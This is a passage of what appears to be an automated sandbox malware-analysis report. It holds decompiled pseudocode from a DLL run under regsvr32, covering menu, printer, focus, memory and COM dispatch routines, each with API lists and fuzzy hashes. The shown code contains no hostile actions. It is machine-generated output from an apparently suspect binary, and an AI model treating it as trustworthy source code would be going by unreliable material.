                                                                                                                						if(GetDCOrgEx(_t53,  &_v12) == 0) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						OffsetRect( &_v28,  ~(_v12.x),  ~(_v12.y));
                                                                                                                						if(IntersectRect( &_v28,  &_v28,  &_v44) == 0) {
                                                                                                                							goto L15;
                                                                                                                						}
                                                                                                                						if(_a8 == 0) {
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						_t33 = IntersectRect( &_v28,  &_v28, _a8);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t31 = 0;
                                                                                                                					goto L18;
                                                                                                                				}
                                                                                                                				return  *0x100bda2c(_a4, _a8, _a12, _a16);
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
                                                                                                                • Instruction ID: 64355e8f9292b3fd31e2b969ec47c5052e073e656d727c24f8f41363996b1544
                                                                                                                • Opcode Fuzzy Hash: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
                                                                                                                • Instruction Fuzzy Hash: 44312771A0420EAFDF05CFA4CD849EEBBFCEF48284B104522F921E6414E770DA819BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1003836D(void* __eflags) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				struct HWND__* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t30;
                                                                                                                				struct HWND__* _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t40;
                                                                                                                				int _t41;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t44;
                                                                                                                				void* _t52;
                                                                                                                				signed int _t54;
                                                                                                                				void* _t62;
                                                                                                                				void* _t64;
                                                                                                                				signed int _t67;
                                                                                                                				void* _t74;
                                                                                                                
                                                                                                                				_t74 = __eflags;
                                                                                                                				_t67 = _t54;
                                                                                                                				_push(_t62);
                                                                                                                				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
                                                                                                                				_t52 = 0;
                                                                                                                				E10049170(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
                                                                                                                				_t33 = GetFocus();
                                                                                                                				_t63 =  *((intOrPtr*)(_t67 + 0x74));
                                                                                                                				_t58 = _t67;
                                                                                                                				_v8 = _t33;
                                                                                                                				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E1001B932(0, _t67, _t74);
                                                                                                                				E10014092(0,  *((intOrPtr*)(_t67 + 0x74)), _t74);
                                                                                                                				_t36 =  *((intOrPtr*)(_t67 + 0x74));
                                                                                                                				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
                                                                                                                					_t52 = 1;
                                                                                                                					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
                                                                                                                				}
                                                                                                                				_t64 = E1001DD4F(_t52, _t63, _t67, 1);
                                                                                                                				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
                                                                                                                					E1001628E(_t64, __eflags, _t67);
                                                                                                                				} else {
                                                                                                                					 *(_t64 + 0x18) = _t67;
                                                                                                                				}
                                                                                                                				_push( *((intOrPtr*)(_t67 + 0x74)));
                                                                                                                				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
                                                                                                                					_t40 = E10038356(_t58);
                                                                                                                				} else {
                                                                                                                					_t40 = E1003833F(_t58);
                                                                                                                				}
                                                                                                                				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                                                                                                                				_v4 = _t40;
                                                                                                                				if(_t52 != 0) {
                                                                                                                					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
                                                                                                                				}
                                                                                                                				_t41 = IsWindow(_v8);
                                                                                                                				_t81 = _t41;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					SetFocus(_v8);
                                                                                                                				}
                                                                                                                				E1001B96C(_t52, _t67, _t64, _t67, _t81);
                                                                                                                				_t43 = _v4;
                                                                                                                				if(_t43 == 0) {
                                                                                                                					_t44 = 2;
                                                                                                                					return _t44;
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,100290F5,00000104,00000000,*.*,00000000,0000F002,00000000,00000000,00000000), ref: 1003837B
                                                                                                                • _memset.LIBCMT ref: 10038394
                                                                                                                • GetFocus.USER32 ref: 1003839C
                                                                                                                • IsWindowEnabled.USER32(?), ref: 100383C9
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100383DC
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 10038425
                                                                                                                • IsWindow.USER32(?), ref: 1003842B
                                                                                                                • SetFocus.USER32 ref: 10038439
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableFocus$Enabled_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2950697994-0
                                                                                                                • Opcode ID: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
                                                                                                                • Instruction ID: 6f38c0740e7c62932b7d44983408263edad7e6d49eecc0aa883ddb142f7e42be
                                                                                                                • Opcode Fuzzy Hash: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
                                                                                                                • Instruction Fuzzy Hash: DE21AD34240B019FE712DF70CE89A2ABBE5FF44B41F1189ADFA428B661DB71E911CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A30D(struct HMENU__* _a4, struct HMENU__* _a8, signed int _a12) {
                                                                                                                				int _v4;
                                                                                                                				int _v8;
                                                                                                                				int _t16;
                                                                                                                				int _t17;
                                                                                                                				int _t19;
                                                                                                                				int _t21;
                                                                                                                				struct HMENU__* _t24;
                                                                                                                
                                                                                                                				_v8 = GetMenuItemCount(_a8);
                                                                                                                				_t16 = GetMenuItemCount(_a4);
                                                                                                                				_t19 = _t16 - 1;
                                                                                                                				if(_t19 >= 0) {
                                                                                                                					do {
                                                                                                                						_t17 = GetSubMenu(_a4, _t19);
                                                                                                                						_t24 = _t17;
                                                                                                                						_t21 = 0;
                                                                                                                						if(_t24 == 0) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						if(_a12 == 0) {
                                                                                                                							if(_v8 <= 0) {
                                                                                                                								goto L14;
                                                                                                                							} else {
                                                                                                                								goto L10;
                                                                                                                							}
                                                                                                                							while(1) {
                                                                                                                								L10:
                                                                                                                								_t17 = GetSubMenu(_a8, _t21);
                                                                                                                								if(_t17 == _t24) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t21 = _t21 + 1;
                                                                                                                								if(_t21 < _v8) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							}
                                                                                                                							_t17 = RemoveMenu(_a4, _t19, 0x400);
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t17 = GetMenuItemCount(_t24);
                                                                                                                						_v4 = _t17;
                                                                                                                						if(_t17 <= 0) {
                                                                                                                							goto L14;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							L5:
                                                                                                                							_t17 = GetSubMenu(_t24, _t21);
                                                                                                                							if(_t17 == _a12) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t21 = _t21 + 1;
                                                                                                                							if(_t21 < _v4) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t17 = RemoveMenu(_t24, _t21, 0x400);
                                                                                                                						_a12 = _a12 & 0x00000000;
                                                                                                                						L14:
                                                                                                                						_t19 = _t19 - 1;
                                                                                                                					} while (_t19 >= 0);
                                                                                                                					return _t17;
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000A31B
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000A325
                                                                                                                • GetSubMenu.USER32 ref: 1000A33D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 1000A34E
                                                                                                                • GetSubMenu.USER32 ref: 1000A35E
                                                                                                                • RemoveMenu.USER32(00000000,00000000,00000400), ref: 1000A376
                                                                                                                • GetSubMenu.USER32 ref: 1000A38E
                                                                                                                • RemoveMenu.USER32(?,00000000,00000400), ref: 1000A3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItem$Remove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3494307843-0
                                                                                                                • Opcode ID: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
                                                                                                                • Instruction ID: d18577bb6ad9008869b906b4cf11c4d394a577308c1e0308ffc8e2554ca28334
                                                                                                                • Opcode Fuzzy Hash: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
                                                                                                                • Instruction Fuzzy Hash: 78119A32109324ABF211DB11CD49E6FBBE8FFC2AC4F114B5AF585A2014D631AE919B67
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001945B(void* __ecx, char* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _t15;
                                                                                                                				void* _t20;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t15 =  *(__ecx + 0x74);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                                					if(_t15 == 0) {
                                                                                                                						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                                						if(_t15 != 0) {
                                                                                                                							_t18 =  *(_t35 + 0x70);
                                                                                                                							if( *(_t35 + 0x70) != 0) {
                                                                                                                								E10021AAD(_t18);
                                                                                                                							}
                                                                                                                							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                                							 *(_t35 + 0x70) = _t20;
                                                                                                                							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                                								E10021AAD( *(_t35 + 0x70));
                                                                                                                								 *(_t35 + 0x70) = 0;
                                                                                                                							}
                                                                                                                							_t15 = ClosePrinter(_v8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t15;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 10019478
                                                                                                                • lstrcmpA.KERNEL32(?,?), ref: 10019484
                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10019496
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194B6
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194BE
                                                                                                                • GlobalLock.KERNEL32 ref: 100194C8
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100194D5
                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100194ED
                                                                                                                  • Part of subcall function 10021AAD: GlobalFlags.KERNEL32(?), ref: 10021AB8
                                                                                                                  • Part of subcall function 10021AAD: GlobalUnlock.KERNEL32(?,?,00000000,100194E7,?,00000000,?,?,00000000,00000000,00000002), ref: 10021ACA
                                                                                                                  • Part of subcall function 10021AAD: GlobalFree.KERNEL32(?), ref: 10021AD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 168474834-0
                                                                                                                • Opcode ID: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
                                                                                                                • Instruction ID: 2d086dcef950c7a74b8bae95a46a9c9ef594960c6ce8d9f37c1e1a3c87edc55f
                                                                                                                • Opcode Fuzzy Hash: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
                                                                                                                • Instruction Fuzzy Hash: 57119A75900600BFDB12DBA9CC89CAF7BFEFF85B407008419FA42D6021DA3AE991D724
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A992(void* __ecx, void* _a4, void* _a8) {
                                                                                                                				long _v8;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t10;
                                                                                                                				void* _t12;
                                                                                                                				void* _t14;
                                                                                                                				void* _t21;
                                                                                                                				void* _t25;
                                                                                                                				void* _t32;
                                                                                                                
                                                                                                                				_t25 = GlobalSize;
                                                                                                                				_t10 = GlobalSize(_a8);
                                                                                                                				_t21 = _a4;
                                                                                                                				_v8 = _t10;
                                                                                                                				if(_t21 != 0) {
                                                                                                                					if(_v8 > GlobalSize(_t21)) {
                                                                                                                						goto L2;
                                                                                                                					} else {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t21 = GlobalAlloc(0x2002, _t10);
                                                                                                                					if(_t21 != 0) {
                                                                                                                						L4:
                                                                                                                						_a4 = GlobalLock(_a8);
                                                                                                                						_t14 = GlobalLock(_t21);
                                                                                                                						E1000A7FB(_t25, _t14, _t32, _t14, GlobalSize(_t21), _a4, _v8);
                                                                                                                						GlobalUnlock(_t21);
                                                                                                                						GlobalUnlock(_a8);
                                                                                                                						_t12 = _t21;
                                                                                                                					} else {
                                                                                                                						L2:
                                                                                                                						_t12 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Size$LockUnlock$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2344174106-0
                                                                                                                • Opcode ID: 68c3b1503e6096a580e2b1701591606604cd8a8eb4d294ae4fb7ad5acf0b0275
                                                                                                                • Instruction ID: 424b07d498546e24803fdd6aa96bd475ff3c4902c72b310acdb31ba6b224f7f9
                                                                                                                • Opcode Fuzzy Hash: 68c3b1503e6096a580e2b1701591606604cd8a8eb4d294ae4fb7ad5acf0b0275
                                                                                                                • Instruction Fuzzy Hash: 4F018471A00218BFEB01AF66CD84C9FBFACEF462E07058166FD0497211D6759E50DAA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100212D3(void* __ecx) {
                                                                                                                				struct HDC__* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                                				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                                				 *0x100bdc78 = GetSystemMetrics(2) + 1;
                                                                                                                				 *0x100bdc7c = GetSystemMetrics(3) + 1;
                                                                                                                				_t18 = GetDC(0);
                                                                                                                				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                                				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                                				return ReleaseDC(0, _t18);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 100212E0
                                                                                                                • GetSystemMetrics.USER32 ref: 100212E7
                                                                                                                • GetSystemMetrics.USER32 ref: 100212EE
                                                                                                                • GetSystemMetrics.USER32 ref: 100212F8
                                                                                                                • GetDC.USER32(00000000), ref: 10021302
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 10021313
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002131B
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10021323
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1151147025-0
                                                                                                                • Opcode ID: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
                                                                                                                • Instruction ID: f7b543dd6023dbd25c52ffe13c507f1655c341cfc04319cd9b5f75389163816c
                                                                                                                • Opcode Fuzzy Hash: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
                                                                                                                • Instruction Fuzzy Hash: 92F03675A40714AEF7206F718C89F677BA4EFC5751F01455AE6418B1D0DAB59801CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E1003A9E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				CHAR* _t160;
                                                                                                                				CHAR* _t162;
                                                                                                                				CHAR* _t165;
                                                                                                                				CHAR* _t168;
                                                                                                                				CHAR* _t174;
                                                                                                                				CHAR* _t176;
                                                                                                                				char _t178;
                                                                                                                				CHAR* _t179;
                                                                                                                				signed int _t188;
                                                                                                                				signed int _t195;
                                                                                                                				CHAR* _t198;
                                                                                                                				signed int _t200;
                                                                                                                				intOrPtr* _t205;
                                                                                                                				CHAR* _t207;
                                                                                                                				CHAR* _t208;
                                                                                                                				int _t209;
                                                                                                                				intOrPtr* _t214;
                                                                                                                				CHAR* _t217;
                                                                                                                				intOrPtr _t221;
                                                                                                                				CHAR* _t223;
                                                                                                                				CHAR* _t237;
                                                                                                                				CHAR* _t245;
                                                                                                                				CHAR* _t246;
                                                                                                                				CHAR* _t248;
                                                                                                                				void* _t252;
                                                                                                                				void* _t253;
                                                                                                                
                                                                                                                				_push(0x60);
                                                                                                                				E10047680(0x10090faa, __ebx, __edi, __esi);
                                                                                                                				_t214 =  *(_t252 + 8) + 0xfffffff0;
                                                                                                                				 *((intOrPtr*)(_t252 - 0x1c)) = _t214;
                                                                                                                				if( *(_t252 + 0x1c) != 0) {
                                                                                                                					__eflags =  *(_t252 + 0x20);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						E100235FF( *(_t252 + 0x20));
                                                                                                                					}
                                                                                                                					_t160 = E1001085C(__eflags,  *((intOrPtr*)(_t252 + 0x10)), 0x100a47bc);
                                                                                                                					__eflags = _t160;
                                                                                                                					if(_t160 != 0) {
                                                                                                                						_t162 =  *((intOrPtr*)( *_t214 + 0x14))( *((intOrPtr*)(_t252 + 0xc)));
                                                                                                                						__eflags = _t162;
                                                                                                                						if(_t162 != 0) {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							__eflags =  *(_t252 - 0x30);
                                                                                                                							if( *(_t252 - 0x30) == 0) {
                                                                                                                								L12:
                                                                                                                								_t245 = E1003998A(_t214,  *((intOrPtr*)(_t252 + 0xc)));
                                                                                                                								__eflags = _t245;
                                                                                                                								 *(_t252 + 0x1c) = _t245;
                                                                                                                								if(_t245 != 0) {
                                                                                                                									__eflags =  *(_t252 + 0x18) - 1;
                                                                                                                									if( *(_t252 + 0x18) != 1) {
                                                                                                                										L27:
                                                                                                                										_t165 =  *(_t252 + 0x18) & 0x0000000c;
                                                                                                                										__eflags = _t165;
                                                                                                                										 *(_t252 - 0x20) = _t165;
                                                                                                                										if(_t165 == 0) {
                                                                                                                											L31:
                                                                                                                											 *(_t252 - 0x18) =  *(_t252 - 0x18) | 0xffffffff;
                                                                                                                											 *(_t252 - 0x14) = 0;
                                                                                                                											 *((short*)(_t252 - 0x6c)) = 0xa;
                                                                                                                											E100235FF(_t252 - 0x5c);
                                                                                                                											__eflags =  *(_t252 + 0x18) - 4;
                                                                                                                											if( *(_t252 + 0x18) != 4) {
                                                                                                                												L51:
                                                                                                                												_t246 =  *(_t252 + 0x1c);
                                                                                                                												L52:
                                                                                                                												_t168 =  *(_t252 - 0x34);
                                                                                                                												_t217 = 0;
                                                                                                                												__eflags =  *(_t252 + 0x18) & 0x00000003;
                                                                                                                												 *(_t252 + 0x1c) = _t168;
                                                                                                                												if(( *(_t252 + 0x18) & 0x00000003) == 0) {
                                                                                                                													L63:
                                                                                                                													__eflags = _t168 - 1;
                                                                                                                													if(_t168 <= 1) {
                                                                                                                														L67:
                                                                                                                														__eflags = _t246[0x10];
                                                                                                                														if(_t246[0x10] != 0) {
                                                                                                                															L71:
                                                                                                                															_t221 =  *((intOrPtr*)(_t252 - 0x1c));
                                                                                                                															 *(_t252 + 8) =  *(_t221 + 0x14);
                                                                                                                															__eflags =  *(_t252 + 0x20);
                                                                                                                															 *(_t252 - 4) = 0;
                                                                                                                															 *(_t221 + 0x14) = 0 |  *(_t252 + 0x20) != 0x00000000;
                                                                                                                															__eflags = _t246[0x10];
                                                                                                                															_push(_t252 - 0x18);
                                                                                                                															if(__eflags != 0) {
                                                                                                                																_push(_t252 - 0x3c);
                                                                                                                																_push( *(_t252 + 0x20));
                                                                                                                																_push( *(_t252 + 0x18));
                                                                                                                																_push(_t246);
                                                                                                                																_t174 = E1003A2DF(_t217, _t221, _t231, 0, _t246, __eflags);
                                                                                                                																L76:
                                                                                                                																_t217 = _t174;
                                                                                                                																L77:
                                                                                                                																 *(_t252 - 4) =  *(_t252 - 4) | 0xffffffff;
                                                                                                                																__eflags = _t217;
                                                                                                                																_t237 =  *(_t252 + 0x20);
                                                                                                                																 *( *((intOrPtr*)(_t252 - 0x1c)) + 0x14) =  *(_t252 + 8);
                                                                                                                																if(_t217 != 0) {
                                                                                                                																	L87:
                                                                                                                																	__eflags =  *(_t252 - 0x14);
                                                                                                                																	if( *(_t252 - 0x14) != 0) {
                                                                                                                																		__imp__#9( *(_t252 - 0x3c));
                                                                                                                																		asm("movsd");
                                                                                                                																		asm("movsd");
                                                                                                                																		asm("movsd");
                                                                                                                																		asm("movsd");
                                                                                                                																	}
                                                                                                                																	__eflags = _t217;
                                                                                                                																	if(_t217 != 0) {
                                                                                                                																		_t223 =  *(_t252 + 0x28);
                                                                                                                																		__eflags = _t223;
                                                                                                                																		if(_t223 != 0) {
                                                                                                                																			_t178 =  *(_t252 - 0x18);
                                                                                                                																			__eflags = _t178 - 0xffffffff;
                                                                                                                																			if(_t178 != 0xffffffff) {
                                                                                                                																				 *_t223 = _t178;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																	_t176 = _t217;
                                                                                                                																	goto L94;
                                                                                                                																} else {
                                                                                                                																	_t179 =  *(_t252 + 0x1c);
                                                                                                                																	__eflags = _t179 -  *(_t252 - 0x34);
                                                                                                                																	if(_t179 <=  *(_t252 - 0x34)) {
                                                                                                                																		goto L87;
                                                                                                                																	}
                                                                                                                																	__eflags =  *_t237 - 9;
                                                                                                                																	if( *_t237 != 9) {
                                                                                                                																		L86:
                                                                                                                																		_t217 = 0x80020005;
                                                                                                                																		goto L87;
                                                                                                                																	}
                                                                                                                																	_t248 = _t237[8];
                                                                                                                																	__eflags = _t248;
                                                                                                                																	if(_t248 == 0) {
                                                                                                                																		goto L86;
                                                                                                                																	}
                                                                                                                																	 *(_t252 - 0x34) = _t179;
                                                                                                                																	__eflags = _t237 - _t252 - 0x5c;
                                                                                                                																	if(_t237 == _t252 - 0x5c) {
                                                                                                                																		_t237 = 0;
                                                                                                                																		__eflags = 0;
                                                                                                                																	} else {
                                                                                                                																		E100235FF(_t237);
                                                                                                                																	}
                                                                                                                																	_t217 =  *((intOrPtr*)( *_t248 + 0x18))(_t248, 0,  *((intOrPtr*)(_t252 + 0x10)),  *((intOrPtr*)(_t252 + 0x14)),  *(_t252 + 0x18), _t252 - 0x3c, _t237,  *((intOrPtr*)(_t252 + 0x24)),  *(_t252 + 0x28));
                                                                                                                																	 *((intOrPtr*)( *_t248 + 8))(_t248);
                                                                                                                																	goto L87;
                                                                                                                																}
                                                                                                                															}
                                                                                                                															__eflags =  *(_t252 - 0x34);
                                                                                                                															if(__eflags != 0) {
                                                                                                                																_push(_t252 - 0x3c);
                                                                                                                																_push(_t246);
                                                                                                                																_t174 = E10039799(_t217, _t221, 0, _t246, __eflags);
                                                                                                                																goto L76;
                                                                                                                															}
                                                                                                                															_push( *(_t252 + 0x20));
                                                                                                                															_push(_t246);
                                                                                                                															E10039EAD(_t221);
                                                                                                                															goto L77;
                                                                                                                														}
                                                                                                                														__eflags = _t168;
                                                                                                                														if(_t168 != 0) {
                                                                                                                															goto L71;
                                                                                                                														}
                                                                                                                														__eflags =  *(_t252 + 0x20);
                                                                                                                														if( *(_t252 + 0x20) != 0) {
                                                                                                                															goto L71;
                                                                                                                														}
                                                                                                                														_t217 = 0x8002000f;
                                                                                                                														goto L87;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t252 - 0x20);
                                                                                                                													if( *(_t252 - 0x20) == 0) {
                                                                                                                														goto L67;
                                                                                                                													}
                                                                                                                													__eflags = _t246[0x10];
                                                                                                                													if(_t246[0x10] != 0) {
                                                                                                                														goto L71;
                                                                                                                													}
                                                                                                                													_t217 = 0x8002000e;
                                                                                                                													goto L87;
                                                                                                                												}
                                                                                                                												__eflags =  *(_t252 + 0x18) & 0x00000001;
                                                                                                                												if(( *(_t252 + 0x18) & 0x00000001) != 0) {
                                                                                                                													L58:
                                                                                                                													__eflags = _t246[8];
                                                                                                                													if(_t246[8] != 0) {
                                                                                                                														goto L63;
                                                                                                                													}
                                                                                                                													__eflags = _t168;
                                                                                                                													if(_t168 <= 0) {
                                                                                                                														goto L63;
                                                                                                                													}
                                                                                                                													__eflags = _t246[0xc] - 9;
                                                                                                                													if(_t246[0xc] != 9) {
                                                                                                                														L55:
                                                                                                                														_t176 = 0x8002000e;
                                                                                                                														goto L94;
                                                                                                                													}
                                                                                                                													_t168 = 0;
                                                                                                                													__eflags =  *(_t252 + 0x20);
                                                                                                                													 *(_t252 - 0x34) = 0;
                                                                                                                													if( *(_t252 + 0x20) != 0) {
                                                                                                                														goto L67;
                                                                                                                													}
                                                                                                                													 *(_t252 + 0x20) = _t252 - 0x5c;
                                                                                                                													goto L63;
                                                                                                                												}
                                                                                                                												__eflags = _t246[0xc];
                                                                                                                												if(_t246[0xc] != 0) {
                                                                                                                													__eflags =  *(_t252 + 0x20);
                                                                                                                													if( *(_t252 + 0x20) != 0) {
                                                                                                                														goto L58;
                                                                                                                													}
                                                                                                                													_t176 = 0x8002000f;
                                                                                                                													goto L94;
                                                                                                                												}
                                                                                                                												goto L55;
                                                                                                                											}
                                                                                                                											_t188 =  *(_t252 - 0x3c);
                                                                                                                											__eflags =  *_t188 - 9;
                                                                                                                											if( *_t188 != 9) {
                                                                                                                												L35:
                                                                                                                												_t246 =  *(_t252 + 0x1c);
                                                                                                                												__eflags = _t246[0xc] - 9;
                                                                                                                												if(_t246[0xc] != 9) {
                                                                                                                													goto L52;
                                                                                                                												}
                                                                                                                												E10049170(0, _t252 - 0x4c, 0, 0x10);
                                                                                                                												__eflags = _t246[8];
                                                                                                                												_push( *(_t252 + 0x28));
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x24)));
                                                                                                                												_push(_t252 - 0x5c);
                                                                                                                												_t231 = _t252 - 0x4c;
                                                                                                                												_push(_t252 - 0x4c);
                                                                                                                												_push(3);
